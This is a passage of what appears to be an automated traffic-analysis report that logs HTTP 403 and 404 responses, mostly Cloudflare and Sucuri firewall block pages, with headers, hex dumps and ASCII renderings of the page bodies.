63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bHDHg9O%2BoANIDKCvjq8XrufoccRbfTlMIILMG96HfYSsaf%2FJCFZOL67A%2F7R9pe%2BCdw%2BNFu%2FANooLIxyprUIq7QXufxcObHiMzrB0EwtCxipKR4d2Z1KqvEBp%2F3XnxFCWzr8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a8203bfe9978-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0;
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:15 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:15 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HX2iykH6zrrmDT02KOVBnCiGh8bhZBMNOFPifV607S0jxhqPR17rasIXsiqieqk9I1Jhep31iOoUJW9CXnOTHZI9tiSBdUNrghMP8ECVVNJSRs5HkO9bAA%2BIjJ0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a8217baa35f1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: e6d0c2ae-1ef6-4fb1-9363-868d00f9e14dCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NU72LAIZr1zrXDMB%2FDzlTrqBPIyxVcyd51ICp3qBPf9ruI8uouXoyOZWh1pGRhRQ9W18n4XnqD7sbnSczMzwQQyAr7MwiJl1OH7Y3a3yPW6FI2RJqMpfN60PpaiclgI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=152.999878Server: cloudflareCF-RAY: 7a59a822afbe908b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Fri, 10 Mar 2023 06:56:30 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ElCA%2BdMynxgksBwsK7pvMo97wIc0Csb%2B56Bb3Z0SwY6NORMX0w4ba8GYZ4AqeQ1IR%2BLQlOvmhhYcrifS1P8g9zjGIVllrqA5rFSaGrLfgHfO9%2FhU2UyzSu8NkcJkzQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a823ea529217-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 31 61 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e Data Ascii: 11a3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta htt
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 10 Mar 2023 06:56:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:15 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DUyT81NVDTj3XLyZawfWE2MEEYd6WZRE3qu5YiIL2fGFgUs9lCY62aBxIZIxLI5jGV6JMZ5mxrgln2XthxthNDE6f3wM74%2F24nLLRemOAOXRd3KiibBNec6xhA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a825dbd730e8-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 62 66 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f Data Ascii: 1bf3<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:16 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jD7qIiPeSmPUVdXNTSN%2BJLJkeka6c2rKubBGSuRUn5HEKNsGqQeiy2238%2FpITPNSOYxc8ynLeNgg4wgnhr5rm3PS%2BCVtSrklg3RfxFVB3JuTAKN3UUqa8oltZEl7wyLC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a8262f389bf2-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:16 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mOWwF%2B1sPSXgWaZnOvBehRR8lc6wEdQnsnkA29%2BRbLyrNm2t9xr2F6QlTitEMVRwBqFnXXDcoRoEUAHSWRHPD3%2FILaeZbe0378UH6qppOC0T5%2Fuv3aPyMZmP8Vv71K%2FX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a8265f639bf2-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 10 Mar 2023 06:56:17 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 